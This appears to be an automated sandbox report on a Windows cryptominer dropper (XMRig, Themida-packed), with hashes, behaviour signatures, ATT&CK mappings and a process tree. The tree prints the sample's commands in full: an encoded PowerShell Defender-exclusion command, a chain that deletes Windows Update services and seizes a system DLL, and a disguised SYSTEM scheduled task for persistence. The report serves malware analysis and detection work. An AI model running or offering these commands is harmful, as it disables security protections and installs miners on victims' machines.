Analysis

  • max time kernel
    304s
  • max time network
    286s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    18-06-2022 04:47

General

  • Target

    d5c9f4b6883bb5c63471c8413514eac92419d7f9cefd75a9029419e2f6ff5d9e.exe

  • Size

    7.5MB

  • MD5

    8ad0c738a717fafbced97df34c15a9b4

  • SHA1

    da1a9fa05230b1549592f00cf372fd7311e8659a

  • SHA256

    d5c9f4b6883bb5c63471c8413514eac92419d7f9cefd75a9029419e2f6ff5d9e

  • SHA512

    a436c1d477be1ff2c96d0ae0c3ed46068c45c4cf7870a0cc55a4df105fb69aa6dc0ef4f25c0fadc94f3175516a465562fd800e15dd610eda74feba5e4beb6b5a

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d5c9f4b6883bb5c63471c8413514eac92419d7f9cefd75a9029419e2f6ff5d9e.exe
    "C:\Users\Admin\AppData\Local\Temp\d5c9f4b6883bb5c63471c8413514eac92419d7f9cefd75a9029419e2f6ff5d9e.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3192
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:3596
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4160
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGQAaQBnAGIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBjAHAAbgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8AZwB5AHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcAB1AGUAIwA+AA=="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4316
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAGQAaQBnAGIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBjAHAAbgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8AZwB5AHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcAB1AGUAIwA+AA=="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4360
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4672
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:4764
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:4808
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:4916
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:4984
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:5004
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:4964
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:4848
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:5036
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:3520
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:5092
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:4204
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:4304
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4324
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4368
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4468
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4488
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:4516
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:4540
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:4556
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:4576
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:4644
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:4380
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:4432
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4712
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4784
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4828
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4944
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4860
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5048
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                          5⤵
                          • Creates scheduled task(s)
                          PID:5108
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                        4⤵
                          PID:4412
                          • C:\Windows\system32\schtasks.exe
                            schtasks /run /tn "GoogleUpdateTaskMachineQC"
                            5⤵
                              PID:4320
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
                        2⤵
                        • Drops startup file
                        PID:2996
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
                        2⤵
                        • Checks computer location settings
                        PID:3484
                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                      1⤵
                      • Drops file in Windows directory
                      • Modifies Internet Explorer settings
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      PID:2972
                    • C:\Windows\system32\browser_broker.exe
                      C:\Windows\system32\browser_broker.exe -Embedding
                      1⤵
                      • Modifies Internet Explorer settings
                      PID:2144
                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                      1⤵
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:3792
                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                      1⤵
                      • Drops file in Windows directory
                      • Modifies Internet Explorer settings
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2276
                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                      1⤵
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3848
                    • C:\Program Files\Chrome\updater.exe
                      "C:\Program Files\Chrome\updater.exe"
                      1⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4668
                      • C:\Windows\System32\conhost.exe
                        "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                        2⤵
                        • Drops file in Drivers directory
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Drops file in Program Files directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4716
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGQAaQBnAGIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBjAHAAbgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8AZwB5AHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcAB1AGUAIwA+AA=="
                          3⤵
                            PID:2452
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -EncodedCommand "PAAjAGQAaQBnAGIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBjAHAAbgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8AZwB5AHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcAB1AGUAIwA+AA=="
                              4⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1128
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            3⤵
                              PID:3060
                              • C:\Windows\system32\sc.exe
                                sc stop UsoSvc
                                4⤵
                                • Launches sc.exe
                                PID:4968
                              • C:\Windows\system32\sc.exe
                                sc stop WaaSMedicSvc
                                4⤵
                                • Launches sc.exe
                                PID:5100
                              • C:\Windows\system32\sc.exe
                                sc stop wuauserv
                                4⤵
                                • Launches sc.exe
                                PID:5108
                              • C:\Windows\system32\sc.exe
                                sc stop bits
                                4⤵
                                • Launches sc.exe
                                PID:4500
                              • C:\Windows\system32\sc.exe
                                sc stop dosvc
                                4⤵
                                • Launches sc.exe
                                PID:4552
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                4⤵
                                • Modifies registry key
                                PID:4472
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                4⤵
                                • Modifies registry key
                                PID:4460
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                4⤵
                                • Modifies registry key
                                PID:4184
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                4⤵
                                • Modifies registry key
                                PID:4264
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                4⤵
                                • Modifies registry key
                                PID:4584
                              • C:\Windows\system32\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:4424
                              • C:\Windows\system32\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:4372
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:4676
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:4684
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:4292
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:4172
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                4⤵
                                  PID:4428
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                  4⤵
                                    PID:4492
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                    4⤵
                                      PID:4412
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                      4⤵
                                        PID:4592
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                        4⤵
                                          PID:4664
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                          4⤵
                                            PID:3216
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                            4⤵
                                              PID:2152
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            3⤵
                                              PID:4856
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-ac 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5024
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-dc 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4304
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-ac 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4324
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-dc 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4496
                                            • C:\Windows\System32\conhost.exe
                                              C:\Windows\System32\conhost.exe
                                              3⤵
                                                PID:5104
                                                • C:\Windows\System32\conhost.exe
                                                  "C:\Windows\System32\conhost.exe" "wbrmiqpttcwvu"
                                                  4⤵
                                                    PID:5056
                                                • C:\Windows\explorer.exe
                                                  C:\Windows\explorer.exe geqitgqjp1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwCOlsPDlF22gmZwBn410EUQ9IkCcmM243LQR6+Ap2x0uXkCtmDSupu5yb6Yg5KOkHRBi+eluc0+GTGEcprpUOASQt9cN3qsUf5pfF6+hYMSMiQqS274bYVOd0QZNUyCdHa7tgXxDVJBK/1O7XDVmGLsijkwk+jB2ng5uVK4uMuI4kHANTh6SKjxoY1Vnt9TAC1hybz7d+r6+M3KmZaPqSht7zWUojj8ZkLQvlNbP44DdzUvKFjQD3hIFelQ5GjNDPWErzU1SRHLlI/Xu6nySNrL6sJcOJOqErY6PivrRYts8UOkHWCZadSIDWgUKlvgdzw8tSVePq08xGXV7HboOnvt2szj5OGj51lCLq7j73ri
                                                  3⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4740
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies registry class
                                              PID:4816
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies registry class
                                              PID:4860

                                            Network

                                            MITRE ATT&CK Matrix ATT&CK v6

                                            Execution

                                            Scheduled Task

                                            1
                                            T1053

                                            Persistence

                                            Modify Existing Service

                                            2
                                            T1031

                                            Scheduled Task

                                            1
                                            T1053

                                            Privilege Escalation

                                            Scheduled Task

                                            1
                                            T1053

                                            Defense Evasion

                                            Modify Registry

                                            3
                                            T1112

                                            Virtualization/Sandbox Evasion

                                            1
                                            T1497

                                            Impair Defenses

                                            1
                                            T1562

                                            File Permissions Modification

                                            1
                                            T1222

                                            Discovery

                                            Query Registry

                                            3
                                            T1012

                                            Virtualization/Sandbox Evasion

                                            1
                                            T1497

                                            System Information Discovery

                                            4
                                            T1082

                                            Impact

                                            Service Stop

                                            1
                                            T1489

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Program Files\Chrome\updater.exe
                                              Filesize

                                              7.2MB

                                              MD5

                                              15def8d428b61d6d8c55b08f5f0f1214

                                              SHA1

                                              13d440c35ff9c010fda3b86142f9ecb4914f9d10

                                              SHA256

                                              b26ef08f132cbda7a7b42cdc19fed05499df49a0c05764dc02ba2196152e7e85

                                              SHA512

                                              3ca69627c7f2eb30868d2f9173804757bd9b5ec41b22777cc407927c17f99f91b2a35e5286d999240aeb6336d208944bce380207386d693db8685e94c8ed794e

                                            • C:\Program Files\Chrome\updater.exe
                                              Filesize

                                              7.2MB

                                              MD5

                                              15def8d428b61d6d8c55b08f5f0f1214

                                              SHA1

                                              13d440c35ff9c010fda3b86142f9ecb4914f9d10

                                              SHA256

                                              b26ef08f132cbda7a7b42cdc19fed05499df49a0c05764dc02ba2196152e7e85

                                              SHA512

                                              3ca69627c7f2eb30868d2f9173804757bd9b5ec41b22777cc407927c17f99f91b2a35e5286d999240aeb6336d208944bce380207386d693db8685e94c8ed794e

                                            • C:\Windows\Temp\lol.bat
                                              Filesize

                                              59B

                                              MD5

                                              f580e0e80cc87b25e38ea2c0c8059d04

                                              SHA1

                                              299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                              SHA256

                                              9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                              SHA512

                                              5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                            • C:\Windows\Temp\run.bat
                                              Filesize

                                              98B

                                              MD5

                                              731afe244b2414169a5f630d52646e56

                                              SHA1

                                              e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                              SHA256

                                              6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                              SHA512

                                              84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

